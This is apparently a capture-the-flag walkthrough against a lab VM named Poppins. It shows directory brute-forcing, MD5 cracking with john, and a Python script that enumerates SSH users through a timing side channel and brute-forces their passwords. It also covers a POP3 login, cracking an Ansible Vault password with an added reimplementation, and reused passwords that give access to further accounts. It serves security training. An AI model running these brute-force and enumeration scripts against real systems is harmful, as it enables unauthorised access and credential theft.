🎯 Target Url │ http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s
🚩 In-Scope Url │ 192.168.56.252
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
💢 Status Code Filters │ [503, 404]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
📂 Scan Dir Listings │ true
💲 Extensions │ [7z, bak, pem, 001, php, zip, txt, html, htm]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 99999
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 378c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s => http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/
200 GET 60l 141w 1531c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/index.html
200 GET 100l 100w 3300c http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/hash.bak
[####################] - 25m 2205800/2205800 0s found:3 errors:0
[####################] - 25m 2205460/2205460 1471/s http://192.168.56.252/s/u/p/e/r/c/a/l/i/f/r/a/g/i/l/i/s/t/i/c/e/x/p/i/a/l/i/d/o/c/i/o/u/s/

This unusual directory holds a hash.bak file: 100 lines and 3300 bytes in total, i.e. 33 bytes per line, which fits 32-character hex digests plus a newline, so raw MD5 is a reasonable first guess. Crack it with john.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john hash.bak --wordlist=rockyou.txt --format=Raw-MD5
Using default input encoding: UTF-8
Loaded 100 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
kent12 (?)
amotejoel (?)
sunjoo (?)
iydgmvin (?)
elised (?)
530223 (?)
viking35 (?)
naughtycat (?)
shadow626 (?)
middelweg (?)
eloscar (?)
cash1407 (?)
carlosmoya (?)
xytyx1972 (?)
vanity17 (?)
v0nowns. (?)
teadorohector (?)
taroh527 (?)
susancliford (?)
suicida*02 (?)
snoopymai12277++ (?)
simpsonss (?)
short487 (?)
sheelyka (?)
sexiestmonkey (?)
sanchezgenao (?)
s9136286d (?)
roldann (?)
rocktolife (?)
rebe11s (?)
o823o2 (?)
nika1212 (?)
nealmc (?)
mymiddlename (?)
mouses01 (?)
mosuga1 (?)
madeson4me (?)
lufkin3 (?)
luckybear13 (?)
loveyai054359503 (?)
little_m (?)
lindilu (?)
lcisme69 (?)
kmkm76 (?)
kiezcute (?)
keyki (?)
kaleli1975 (?)
justine145 (?)
jojoisamuffin1 (?)
jmac92777 (?)
jennycane6 (?)
ilovenickjerryjonas (?)
igorlain (?)
hold40 (?)
gnyja4 (?)
gina5432 (?)
foffbastards (?)
federal5 (?)
eryt6587oi (?)
elogue (?)
ddm1203 (?)
dazha (?)
dah3ss (?)
copperkiwi324 (?)
cocian (?)
cesurcesur (?)
cannonballs (?)
boggsjr (?)
ben and leo (?)
baby0sita (?)
amp#88 (?)
adiksapink (?)
actionlive (?)
Sammon (?)
McCain (?)
MENZOBERRANZAN (?)
MARIEC210 (?)
Karis123456 (?)
Dan2109<3 (?)
Cusita74 (?)
ARES29 (?)
978645312N (?)
8153154 (?)
7297163 (?)
56371105 (?)
5636378paulo (?)
33570654 (?)
30procklisroad (?)
224466882468 (?)
2173512 (?)
21094572 (?)
14212862 (?)
113fox.13 (?)
09202515339 (?)
0869169575 (?)
0866500130 (?)
0865508166 (?)
0848499262 (?)
0831428854 (?)
0800385914 (?)
100g 0:00:00:00 DONE (2026-02-04 02:32) 158.7g/s 22035Kp/s 22035Kc/s 1161MC/s 0800436836..0800349428
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

Save the cracked passwords as a password wordlist.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john --show --format=Raw-MD5 hash.bak | cut -d: -f2 > cracked_passwords.txt

Visit the site on port 80 and use cewl to generate a lower-cased wordlist of words that might be usernames.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cewl 192.168.56.252:80 | tr 'A-Z' 'a-z' > users.txt

Brute-forcing with hydra got nowhere. It then turned out that this host's SSH behaves differently depending on the username: for an existing user it prompts for a password, while for a nonexistent user it immediately returns Permission denied (publickey). That difference is a side channel that reveals which usernames exist.

Have an AI generate a script that automates the enumeration and the brute force:

#!/usr/bin/env python3
import subprocess
import sys
import paramiko
from colorama import Fore, Style, init

# initialise colours
init(autoreset=True)

# ======================
# configuration
# ======================
TARGET_IP = "192.168.56.252"
USER_LIST_FILE = "users.txt"              # the cewl output built above
PASS_LIST_FILE = "cracked_passwords.txt"  # the john --show output built above
SSH_PORT = 22
TIMEOUT_CHECK = 4  # probe timeout in seconds
# a non-existent user is rejected instantly, so an ssh process that is still
# alive after 4 seconds is sitting at the password prompt
# ======================


def read_lines(file_path):
    """Read a wordlist, skipping blank lines and '#' comments."""
    lines = []
    try:
        with open(file_path, 'r', encoding='utf-8') as f:
            for line in f:
                clean_line = line.strip()
                if clean_line and not clean_line.startswith("#"):
                    lines.append(clean_line)
    except FileNotFoundError:
        print(f"{Fore.RED}[!] Error: file '{file_path}' does not exist!")
        sys.exit(1)
    return lines


def check_user_via_timeout(user):
    """
    Core logic:
    1. run ssh user@ip
    2. instant 'Permission denied (publickey)' -> user does not exist -> False
    3. still running after TIMEOUT_CHECK seconds -> ssh is waiting for a
       password -> user exists -> True
    """
    cmd = [
        "ssh",
        "-p", str(SSH_PORT),
        "-o", "StrictHostKeyChecking=no",  # do not block on the host-key prompt
        "-o", "BatchMode=no",              # interactive mode, so that it can hang on the prompt
        f"{user}@{TARGET_IP}"
    ]

    try:
        # we do not care about stdout, only whether the process times out.
        # note: ssh writes the password prompt to the controlling tty, not to
        # stderr, which is why the prompt still appears in the output below
        subprocess.run(
            cmd,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.PIPE,  # capture stderr (the publickey error)
            timeout=TIMEOUT_CHECK,   # the actual check: a hard timeout
            encoding='utf-8'
        )

        # reached only if ssh exited before the timeout: connection refused,
        # or the immediate publickey rejection
        return False

    except subprocess.TimeoutExpired:
        # ssh was still alive (waiting for a password): the user exists.
        # subprocess.run kills the hanging child for us on timeout
        return True

    except Exception as e:
        print(f"{Fore.RED}[!] subprocess error: {e}")
        return False


def brute_force_paramiko(user, passwords):
    """
    Password brute force with Paramiko for a user confirmed to exist
    """
    print(f"{Fore.MAGENTA}[*] Locked on user '{user}'! Starting password brute force ({len(passwords)} candidates)...")

    for i, password in enumerate(passwords):
        # progress line
        print(f"    [-] Trying: {password} ({i+1}/{len(passwords)})", end="\r")

        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        try:
            client.connect(
                TARGET_IP,
                port=SSH_PORT,
                username=user,
                password=password,
                timeout=3,
                allow_agent=False,   # password auth only: no agent keys
                look_for_keys=False  # and no ~/.ssh keys
            )
            # login succeeded
            print(f"\n{Fore.GREEN}==========================================")
            print(f"{Fore.GREEN}[+] Brute force succeeded!!!")
            print(f"{Fore.GREEN}[+] User: {user}")
            print(f"{Fore.GREEN}[+] Password: {password}")
            print(f"{Fore.GREEN}==========================================")
            return True
        except paramiko.AuthenticationException:
            pass  # wrong password, try the next one
        except (paramiko.SSHException, OSError) as e:
            # transport-level problem (rate limiting, reset): report it instead
            # of silently counting it as a failed guess
            print(f"\n{Fore.RED}[!] {user}:{password} -> {e}")
        finally:
            client.close()

    print(f"\n{Fore.YELLOW}[-] No password found for user '{user}'.")
    return False


def main():
    users = read_lines(USER_LIST_FILE)
    passwords = read_lines(PASS_LIST_FILE)

    print(f"{Fore.CYAN}[*] Starting hybrid scan - target: {TARGET_IP}")
    print(f"{Fore.CYAN}[*] Probe logic: subprocess timeout (timeout = user exists)")
    print(f"{Fore.CYAN}[*] Brute-force logic: Paramiko")
    print("-" * 50)

    for user in users:
        # crude junk filter: cewl output contains long words and phrases
        if len(user) > 30 or " " in user:
            continue

        print(f"[*] Probing user: {user:<20} ... ", end="")
        sys.stdout.flush()

        # 1. subprocess + timeout decides whether the user exists
        exists = check_user_via_timeout(user)

        if exists:
            print(f"{Fore.GREEN}[valid] (timeout/waiting for password)")

            # 2. if so, hand over to Paramiko for the dictionary run
            if brute_force_paramiko(user, passwords):
                # stop after the first hit? uncomment the next line to do so
                # sys.exit(0)
                pass
        else:
            print(f"{Fore.RED}[skip] (immediate exit/publickey)")


if __name__ == "__main__":
    main()

This yields two usernames: jane and bert. Note that michael and winifred, which also exist as accounts (see the /home listing further down), are reported as absent: the side channel tells you which users the server accepts password authentication for, not which accounts exist.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# python3 exp.py
[*] Starting hybrid scan - target: 192.168.56.252
[*] Probe logic: subprocess timeout (timeout = user exists)
[*] Brute-force logic: Paramiko
--------------------------------------------------
[*] Probing user: and ... [skip] (immediate exit/publickey)
[*] Probing user: the ... [skip] (immediate exit/publickey)
[*] Probing user: mary ... [skip] (immediate exit/publickey)
[*] Probing user: poppins ... [skip] (immediate exit/publickey)
[*] Probing user: banks ... [skip] (immediate exit/publickey)
[*] Probing user: children ... [skip] (immediate exit/publickey)
[*] Probing user: their ... [skip] (immediate exit/publickey)
[*] Probing user: michael ... [skip] (immediate exit/publickey)
jane@192.168.56.252's password: [valid] (timeout/waiting for password)
[*] Locked on user 'jane'! Starting password brute force (101 candidates)...
    [-] Trying: 100 password hashes cracked, 0 left (101/101)
[-] No password found for user 'jane'.
[*] Probing user: with ... [skip] (immediate exit/publickey)
[*] Probing user: family ... [skip] (immediate exit/publickey)
[*] Probing user: magical ... [skip] (immediate exit/publickey)
[*] Probing user: initially ... [skip] (immediate exit/publickey)
[*] Probing user: joy ... [skip] (immediate exit/publickey)
[*] Probing user: the ... [skip] (immediate exit/publickey)
[*] Probing user: george ... [skip] (immediate exit/publickey)
[*] Probing user: who ... [skip] (immediate exit/publickey)
[*] Probing user: nanny ... [skip] (immediate exit/publickey)
[*] Probing user: through ... [skip] (immediate exit/publickey)
[*] Probing user: her ... [skip] (immediate exit/publickey)
[*] Probing user: but ... [skip] (immediate exit/publickey)
[*] Probing user: outings ... [skip] (immediate exit/publickey)
[*] Probing user: enchanting ... [skip] (immediate exit/publickey)
[*] Probing user: lessons ... [skip] (immediate exit/publickey)
[*] Probing user: home ... [skip] (immediate exit/publickey)
[*] Probing user: winifred ... [skip] (immediate exit/publickey)
[*] Probing user: importance ... [skip] (immediate exit/publickey)
[*] Probing user: life ... [skip] (immediate exit/publickey)
[*] Probing user: friend ... [skip] (immediate exit/publickey)
bert@192.168.56.252's password: [valid] (timeout/waiting for password)
[*] Locked on user 'bert'! Starting password brute force (101 candidates)...
    [-] Trying: jmac92777 (31/101)
==========================================
[+] Brute force succeeded!!!
[+] User: bert
[+] Password: jmac92777
==========================================
[*] Probing user: chimney ... [skip] (immediate exit/publickey)
[*] Probing user: sweep ... [skip] (immediate exit/publickey)
[*] Probing user: artist ... [skip] (immediate exit/publickey)
[*] Probing user: for ... [skip] (immediate exit/publickey)
[*] Probing user: arrives ... [skip] (immediate exit/publickey)
[*] Probing user: brings ... [skip] (immediate exit/publickey)
[*] Probing user: somewhat ... [skip] (immediate exit/publickey)
[*] Probing user: strong ... [skip] (immediate exit/publickey)
[*] Probing user: bond ... [skip] (immediate exit/publickey)
[*] Probing user: learns ... [skip] (immediate exit/publickey)
[*] Probing user: banker ... [skip] (immediate exit/publickey)
[*] Probing user: stern ... [skip] (immediate exit/publickey)
[*] Probing user: enjoys ... [skip] (immediate exit/publickey)
[*] Probing user: disciplined ... [skip] (immediate exit/publickey)
[*] Probing user: father ... [skip] (immediate exit/publickey)
[*] Probing user: wisdom ... [skip] (immediate exit/publickey)
[*] Probing user: fantastical ... [skip] (immediate exit/publickey)
[*] Probing user: humor ... [skip] (immediate exit/publickey)
[*] Probing user: providing ... [skip] (immediate exit/publickey)
[*] Probing user: joins ... [skip] (immediate exit/publickey)
[*] Probing user: often ... [skip] (immediate exit/publickey)
[*] Probing user: close ... [skip] (immediate exit/publickey)
[*] Probing user: street ... [skip] (immediate exit/publickey)
[*] Probing user: multitalented ... [skip] (immediate exit/publickey)
[*] Probing user: adventures ... [skip] (immediate exit/publickey)
[*] Probing user: journeys ... [skip] (immediate exit/publickey)
[*] Probing user: elder ... [skip] (immediate exit/publickey)
[*] Probing user: joys ... [skip] (immediate exit/publickey)
[*] Probing user: simple ... [skip] (immediate exit/publickey)
[*] Probing user: appreciate ... [skip] (immediate exit/publickey)
[*] Probing user: comes ... [skip] (immediate exit/publickey)
[*] Probing user: skeptical ... [skip] (immediate exit/publickey)
[*] Probing user: quickly ... [skip] (immediate exit/publickey)
[*] Probing user: drawn ... [skip] (immediate exit/publickey)
[*] Probing user: causes ... [skip] (immediate exit/publickey)
[*] Probing user: social ... [skip] (immediate exit/publickey)
[*] Probing user: into ... [skip] (immediate exit/publickey)
[*] Probing user: world ... [skip] (immediate exit/publickey)
[*] Probing user: preoccupied ... [skip] (immediate exit/publickey)
[*] Probing user: mother ... [skip] (immediate exit/publickey)
[*] Probing user: wife ... [skip] (immediate exit/publickey)
[*] Probing user: younger ... [skip] (immediate exit/publickey)
[*] Probing user: influence ... [skip] (immediate exit/publickey)
[*] Probing user: curious ... [skip] (immediate exit/publickey)
[*] Probing user: adventurous ... [skip] (immediate exit/publickey)
[*] Probing user: forms ... [skip] (immediate exit/publickey)
[*] Probing user: valuable ... [skip] (immediate exit/publickey)
[*] Probing user: whimsical ... [skip] (immediate exit/publickey)
[*] Probing user: through ... [skip] (immediate exit/publickey)
[*] Probing user: adventure ... [skip] (immediate exit/publickey)
[*] Probing user: magic ... [skip] (immediate exit/publickey)
[*] Probing user: brand ... [skip] (immediate exit/publickey)
[*] Probing user: unique ... [skip] (immediate exit/publickey)
[*] Probing user: she ... [skip] (immediate exit/publickey)
[*] Probing user: wind ... [skip] (immediate exit/publickey)
[*] Probing user: east ... [skip] (immediate exit/publickey)
[*] Probing user: carried ... [skip] (immediate exit/publickey)
[*] Probing user: when ... [skip] (immediate exit/publickey)
[*] Probing user: mischievous ... [skip] (immediate exit/publickey)
[*] Probing user: need ... [skip] (immediate exit/publickey)
[*] Probing user: london ... [skip] (immediate exit/publickey)
[*] Probing user: century ... [skip] (immediate exit/publickey)
[*] Probing user: turn ... [skip] (immediate exit/publickey)
[*] Probing user: plot ... [skip] (immediate exit/publickey)
[*] Probing user: movie ... [skip] (immediate exit/publickey)
[*] Probing user: wonder ... [skip] (immediate exit/publickey)
[*] Probing user: classic ... [skip] (immediate exit/publickey)
[*] Probing user: timeless ... [skip] (immediate exit/publickey)
[*] Probing user: them ... [skip] (immediate exit/publickey)
[*] Probing user: teaching ... [skip] (immediate exit/publickey)
[*] Probing user: care ... [skip] (immediate exit/publickey)
[*] Probing user: she ... [skip] (immediate exit/publickey)
[*] Probing user: abilities ... [skip] (immediate exit/publickey)
[*] Probing user: perfect ... [skip] (immediate exit/publickey)
[*] Probing user: practically ... [skip] (immediate exit/publickey)
[*] Probing user: happiness ... [skip] (immediate exit/publickey)
[*] Probing user: bring ... [skip] (immediate exit/publickey)
[*] Probing user: perspectives ... [skip] (immediate exit/publickey)
[*] Probing user: challenge ... [skip] (immediate exit/publickey)
[*] Probing user: that ... [skip] (immediate exit/publickey)
[*] Probing user: escapades ... [skip] (immediate exit/publickey)
[*] Probing user: unforgettable ... [skip] (immediate exit/publickey)
[*] Probing user: leads ... [skip] (immediate exit/publickey)
[*] Probing user: with ... [skip] (immediate exit/publickey)
[*] Probing user: everyday ... [skip] (immediate exit/publickey)
[*] Probing user: love ... [skip] (immediate exit/publickey)
[*] Probing user: rediscover ... [skip] (immediate exit/publickey)
[*] Probing user: parents ... [skip] (immediate exit/publickey)
[*] Probing user: helps ... [skip] (immediate exit/publickey)
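A less fragile way to read the same side channel, added here as an example (it is not the script above and not part of the original write-up): instead of waiting for ssh to hang at a password prompt, run it non-interactively with BatchMode=yes and read the method list in its final "Permission denied (...)" line. That list is what the server advertised after the client's initial "none" authentication attempt, so it reads "publickey,password" for an account the server accepts a password for and just "publickey" for a name it does not. The assumption, taken from the behaviour observed on this box, is that the server advertises different methods for different users; a server that offers the same list to everyone returns the same verdict for every name and the probe learns nothing. The verdict strings and the default users.txt path are this example's own choices.

```python
#!/usr/bin/env python3
"""Added example, not the write-up's script: SSH user probing through the
advertised-authentication-methods side channel, read from ssh's own exit
message instead of inferred from a timeout.

Assumption (from the behaviour observed on this box): sshd advertises
"publickey,password" for accounts it allows password logins for and only
"publickey" for everything else. If the server advertises the same list to
every user, every probe comes back with the same verdict and nothing is learnt.
"""
import re
import subprocess
from typing import Optional

# ssh prints the server's last advertised method list in its final error, e.g.
#   bert@192.168.56.252: Permission denied (publickey,password).
DENIED_RE = re.compile(r"Permission denied \(([^)]*)\)")


def parse_denied_methods(stderr_text: str) -> Optional[frozenset]:
    """Return the method set from the last 'Permission denied (...)' line, or
    None when ssh never reached authentication (refused, timed out, host key)."""
    found = DENIED_RE.findall(stderr_text)
    if not found:
        return None
    return frozenset(m.strip() for m in found[-1].split(",") if m.strip())


def classify_user(methods: Optional[frozenset]) -> str:
    """'exists' if the server offered anything beyond publickey (here: password),
    'absent' if it offered publickey only, 'unknown' if there was no verdict."""
    if methods is None:
        return "unknown"
    if methods - {"publickey"}:
        return "exists"
    return "absent"


def probe_user(host: str, user: str, port: int = 22, timeout: float = 15) -> str:
    """One non-interactive ssh attempt. BatchMode=yes makes ssh give up instead
    of prompting, so both kinds of user return immediately and no prompt is
    written to the terminal; PubkeyAuthentication=no keeps local keys out of it."""
    cmd = [
        "ssh", "-p", str(port),
        "-o", "BatchMode=yes",
        "-o", "PubkeyAuthentication=no",
        "-o", "StrictHostKeyChecking=no",
        "-o", "UserKnownHostsFile=/dev/null",
        "-o", "ConnectTimeout=5",
        f"{user}@{host}", "true",
    ]
    try:
        proc = subprocess.run(cmd, stdin=subprocess.DEVNULL,
                              stdout=subprocess.DEVNULL, stderr=subprocess.PIPE,
                              timeout=timeout, text=True)
    except subprocess.TimeoutExpired:
        return "unknown"
    return classify_user(parse_denied_methods(proc.stderr))


if __name__ == "__main__":
    import sys
    # usage: python3 ssh_enum.py [host] [wordlist]; defaults are this box and
    # the cewl list built above
    host = sys.argv[1] if len(sys.argv) > 1 else "192.168.56.252"
    wordlist = sys.argv[2] if len(sys.argv) > 2 else "users.txt"
    with open(wordlist, encoding="utf-8", errors="ignore") as f:
        for name in (line.strip() for line in f):
            if name and " " not in name:
                print(f"{name:<20} {probe_user(host, name)}")
```

Because the probe never waits for a prompt, it takes a connection round-trip per name instead of four seconds per hit, and it cannot mistake a slow network for an existing user: a timeout or refused connection is reported as "unknown" rather than as a verdict.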

Log in as bert with the recovered password.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh bert@192.168.56.252
The authenticity of host '192.168.56.252 (192.168.56.252)' can't be established.
ED25519 key fingerprint is: SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:9: [hashed name]
~/.ssh/known_hosts:10: [hashed name]
~/.ssh/known_hosts:12: [hashed name]
~/.ssh/known_hosts:16: [hashed name]
~/.ssh/known_hosts:17: [hashed name]
~/.ssh/known_hosts:18: [hashed name]
~/.ssh/known_hosts:19: [hashed name]
~/.ssh/known_hosts:20: [hashed name]
(25 additional names omitted)
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.252' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
bert@192.168.56.252's password:
Linux Poppins 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
This account is currently not available.
Connection to 192.168.56.252 closed.

The session is closed immediately: "This account is currently not available" is the message printed by /usr/sbin/nologin, so bert has no login shell, but his password is still valid for other services. The banner also says "You have mail", which points back to port 110 (POP3, Dovecot) from the port scan; the same credentials work there.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc 192.168.56.252 110
+OK Dovecot (Debian) ready.
user bert
+OK
pass jmac92777
+OK Logged in.
stat
+OK 1 1517
retr 1
+OK 1517 octets
Return-path: <jane@poppins>
Envelope-to: bert@poppins
Delivery-date: Fri, 29 Aug 2025 06:33:49 -0400
Received: from jane by Poppins with local (Exim 4.94.2)
(envelope-from <jane@poppins>)
id 1urwQW-0001RQ-CD
for bert@poppins; Fri, 29 Aug 2025 06:33:48 -0400
To: bert@poppins
Subject: Urgent: Prod Server Credentials for Ansible Playbook
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1urwQW-0001RQ-CD@Poppins>
From: jane@poppins
Date: Fri, 29 Aug 2025 06:33:48 -0400

Hi Bert,

I've just finished the new Ansible playbook for the a-27 software deployment on our main production server, `web01.poppins.dsz`. It's ready to go.

The playbook contains some sensitive API keys, so I've encrypted the variables using Ansible Vault. You'll need to use the `ansible-vault decrypt` command to run it.

Here is the vault string you'll need to paste into the `secrets.yml` file.

```
$ANSIBLE_VAULT;1.1;AES256
66626631636362303332633238373338386634373434646532656534323230333938303331663630
3236333934663930343263363831353138323630393134320a366366393939373636386538336336
34353536656637313762323832643339633234656635326137633439303730373335386536306436
6335363366376634630a326563623737626337353436323565643365333061663661396337613731
3730
```
Let me know if you hit any issues. We need to get this deployed by EOD.

Thanks,
Jane
.
exit
-ERR Unknown command: EXIT
quit
+OK Logging out.

Crack the vault password with john. ansible2john converts the vault blob into a hash format john understands (the salt, the stored HMAC tag and the ciphertext); for each candidate password john derives the key with PBKDF2-SHA256 and recomputes the HMAC over the ciphertext, so the vault is never actually decrypted until the right password is found.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# vim 1.vault

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ansible2john 1.vault > tmp

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john tmp --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 256/256 AVX2 8x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
javiel (1.vault)
1g 0:00:00:29 DONE (2026-02-04 02:43) 0.03345g/s 2974p/s 2974c/s 2974C/s jojo95..janele
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ansible-vault view 1.vault
Vault password:
cumibug
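What ansible2john hands to john, as an added example in standard-library Python (not the write-up's commands and not Ansible's own code): the vault blob from Jane's mail is split into salt, HMAC tag and ciphertext, PBKDF2-HMAC-SHA256 is run on each candidate password, and a candidate is accepted when the recomputed HMAC-SHA256 over the ciphertext matches the stored tag. Only the HMAC key is needed for that, so the cracking loop never runs AES. The optional decrypt_vault performs the AES-256-CTR step that ansible-vault view does and assumes the `cryptography` package is installed. The constants (10000 iterations, an 80-byte derived key split 32/32/16) are Ansible's Vault 1.1 parameters; the wordlist path in the main block is a placeholder.

```python
#!/usr/bin/env python3
"""Added example, not the write-up's commands and not Ansible's own code:
the check that ansible2john + john run against an Ansible Vault 1.1 blob,
written out in standard-library Python.

Vault 1.1/AES256 layout: the hex body decodes to "salt_hex\\nhmac_hex\\nct_hex".
PBKDF2-HMAC-SHA256(password, salt, 10000 iterations, 80 bytes) is split into
key1 (32 bytes, AES-256-CTR key), key2 (32 bytes, HMAC key) and iv (16 bytes).
A candidate password is right iff HMAC-SHA256(key2, ciphertext) equals the
stored tag, so the cracking loop never has to run AES.
"""
import binascii
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

ITERATIONS = 10000          # Ansible's fixed PBKDF2 iteration count
KEY_LEN, IV_LEN = 32, 16    # AES-256 key, AES block-sized CTR nonce


def parse_vault(vault_text: str) -> Tuple[bytes, bytes, bytes]:
    """Split a vault blob into (salt, hmac_tag, ciphertext)."""
    lines = [ln.strip() for ln in vault_text.strip().splitlines() if ln.strip()]
    if not lines or not lines[0].startswith("$ANSIBLE_VAULT;1.1;AES256"):
        raise ValueError("not an Ansible Vault 1.1 AES256 blob")
    inner = binascii.unhexlify("".join(lines[1:]))
    salt_hex, tag_hex, ct_hex = inner.split(b"\n")
    return (binascii.unhexlify(salt_hex), binascii.unhexlify(tag_hex),
            binascii.unhexlify(ct_hex))


def derive_keys(password: str, salt: bytes) -> Tuple[bytes, bytes, bytes]:
    """PBKDF2 exactly as Ansible does it; returns (key1, key2, iv)."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                             ITERATIONS, dklen=2 * KEY_LEN + IV_LEN)
    return dk[:KEY_LEN], dk[KEY_LEN:2 * KEY_LEN], dk[2 * KEY_LEN:]


def password_matches(vault_text: str, password: str) -> bool:
    """True iff the password reproduces the stored HMAC tag (what john tests)."""
    salt, tag, ct = parse_vault(vault_text)
    _key1, key2, _iv = derive_keys(password, salt)
    return hmac.compare_digest(hmac.new(key2, ct, hashlib.sha256).digest(), tag)


def crack_vault(vault_text: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack: parse once, then one PBKDF2 + one HMAC per candidate."""
    salt, tag, ct = parse_vault(vault_text)
    for candidate in candidates:
        _key1, key2, _iv = derive_keys(candidate, salt)
        if hmac.compare_digest(hmac.new(key2, ct, hashlib.sha256).digest(), tag):
            return candidate
    return None


def decrypt_vault(vault_text: str, password: str) -> bytes:
    """The step ansible-vault view performs after the HMAC check: AES-256-CTR
    plus PKCS7 unpadding. Needs the 'cryptography' package (assumed installed)."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    salt, tag, ct = parse_vault(vault_text)
    key1, key2, iv = derive_keys(password, salt)
    if not hmac.compare_digest(hmac.new(key2, ct, hashlib.sha256).digest(), tag):
        raise ValueError("wrong vault password (HMAC mismatch)")
    dec = Cipher(algorithms.AES(key1), modes.CTR(iv)).decryptor()
    padded = dec.update(ct) + dec.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


# The blob quoted in Jane's mail above, copied verbatim.
VAULT_FROM_MAIL = """$ANSIBLE_VAULT;1.1;AES256
66626631636362303332633238373338386634373434646532656534323230333938303331663630
3236333934663930343263363831353138323630393134320a366366393939373636386538336336
34353536656637313762323832643339633234656635326137633439303730373335386536306436
6335363366376634630a326563623737626337353436323565643365333061663661396337613731
3730
"""

if __name__ == "__main__":
    import sys
    # usage: python3 vault_crack.py [wordlist]; the wordlist path is a placeholder
    wordlist = sys.argv[1] if len(sys.argv) > 1 else "rockyou.txt"
    with open(wordlist, encoding="utf-8", errors="ignore") as f:
        hit = crack_vault(VAULT_FROM_MAIL, (line.rstrip("\n") for line in f))
    print("vault password:", hit)
```

The cost per guess is one PBKDF2 run of 10000 iterations, which is what keeps john at a few thousand candidates per second in the output above; the HMAC comparison afterwards is negligible. Because the tag is over the ciphertext only, a wrong password is rejected without ever touching the plaintext.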

The vault password javiel turns out to be jane's account password as well (the same secret reused for the vault and for SSH).

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ssh jane@192.168.56.252
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
jane@192.168.56.252's password:
Linux Poppins 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jane@Poppins:~$ ls
jane@Poppins:~$ ls /home
bert jane michael winifred

The vault's plaintext, cumibug, is michael's password.

jane@Poppins:~$ su michael
Password:
michael@Poppins:/home/jane$ cd ~
michael@Poppins:~$ ls
michael@Poppins:~$ ls -al
total 20
drwxr-xr-x 2 michael michael 4096 Aug 29 09:59 .
drwxr-xr-x 6 root root 4096 Aug 29 06:13 ..
lrwxrwxrwx 1 root root 9 Aug 29 09:59 .bash_history -> /dev/null
-rw-r--r-- 1 michael michael 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 michael michael 3526 Apr 18 2019 .bashrc
-rw-r--r-- 1 michael michael 807 Apr 18 2019 .profile
michael@Poppins:~$ cd /jane
bash: cd: /jane: No such file or directory
michael@Poppins:~$ cd /home/jane
michael@Poppins:/home/jane$ ls
michael@Poppins:/home/jane$ ls -al
total 20
